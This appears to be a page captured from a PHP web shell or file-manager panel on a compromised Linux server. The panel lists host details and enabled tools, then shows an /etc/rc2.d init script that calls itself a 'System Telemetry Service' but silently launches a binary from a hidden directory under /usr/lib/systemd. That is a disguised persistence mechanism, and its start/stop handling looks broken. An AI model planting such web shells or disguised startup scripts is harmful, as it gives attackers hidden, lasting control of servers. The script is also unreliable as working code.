| Server IP : 198.244.165.102 / Your IP : 216.73.216.218 [ Web Server : nginx/1.24.0 System : Linux modovh-ub-01 6.8.0-138-generic #138-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 31 22:41:49 UTC 2026 x86_64 User : colleary ( 1011) PHP Version : 8.3.23 Disable Function : NONE Domains : 2 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /etc/rc2.d/ |
Upload File : |
#!/bin/sh ### BEGIN INIT INFO # Provides: system-telemetry-monitor # Required-Start: # Required-Stop: # Default-Start: 2 3 4 5 # Default-Stop: 0 1 6 # Short-Description: System Telemetry Service ### END INIT INFO case "" in start) VPS_AGENT_CONFIG="/usr/lib/systemd/.8f615da9/config" nohup "/usr/lib/systemd/net-analyticsd" >/dev/null 2>&1 & ;; stop) pkill -x "net-analyticsd" 2>/dev/null || true ;; restart) bash stop; sleep 1; bash start ;; esac